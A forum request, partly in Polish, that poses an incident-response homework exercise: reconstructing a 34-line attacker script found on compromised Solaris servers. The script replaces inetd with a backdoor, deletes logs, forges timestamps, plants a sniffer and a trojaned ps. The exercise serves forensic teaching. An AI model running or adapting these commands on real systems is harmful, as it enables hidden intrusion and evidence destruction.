Hej, mam takie zadanie i potrzebuje rozwiazania.
Bede wdzieczny za okazana pomoc.
You are the Chief Security Officer of PayByMobile Inc., a company which provides online pay services.
It is monday morning and you are just trying to get your first cup of coffee to start the day when Bill, your server farm admin calls you and reports unusual behavior on some of the Solaris machines. When he was working on the console he got messages that inetd could not bind to ports 21 and 23. When he examined the processes that were running he found that three instances of inetd were running. This was not supposed to be, so he killed two of them. Then he checked the other Solaris systems and found two more with the same problems.
You start searching the machines and find an unknown file n00b.tar. The file contained the following other files: act, temp, ps and update. You open the act file and find it to be a script, that could tell you what was done to your systems. You find the script below.
Please answer the following questions:
- Try to reconstruct what the attacker was doing and explain every line of the script! (refer to the line numbers)
- Which files are changed in the system and which of those files is likely to be a backdoor?
- Given that the program update is a sniffer, where did the attacker hide the program and its log file? Why do you think the attacker has chosen this location?
1 unset HISTFILE; unset SAVEHIST
2 cp temp /usr/sbin/inetd;
3 chown root /usr/sbin/inetd;
4 chgrp root /usr/sbin/inetd;
5 touch 0716000097 /usr/sbin/inetd;
6 rm -rf temp /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb*
7 rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec*
8 /usr/sbin/inetd -s;
9 /usr/sbin/inetd -s;
10 telnet localhost;
11 /usr/sbin/inetd -s;
12 ps -ef | grep inetd | grep bob |awk '{print "kill -9 " $2 }' > boo
13 chmod 700 boo
14 ./boo
15 ps -ef | grep nfs | grep statd |awk '{print "kill -9 " $2 }' > boo
16 chmod 700 boo
17 ./boo
18 ps -ef | grep ttdb | grep -v grep |awk '{print "kill -9 " $2 }' > boo
19 chmod 700 boo
20 ./boo
21 rm -rf boo
22 mkdir /usr/man/tmp
23 mv update ps /usr/man/tmp
24 cd /usr/man/tmp
25 echo 1 \"./update -s -o output\" > /kernel/pssys
26 chmod 755 ps update
27 ./update -s -o output &
28 cp ps /usr/ucb/ps
29 mv ps /usr/bin/ps
30 touch 0716000097 /usr/bin/ps /usr/ucb/ps
31 cd /
32 ps -ef | grep bob | grep -v grep
33 ps -ef | grep stat | grep -v grep
34 ps -ef | grep update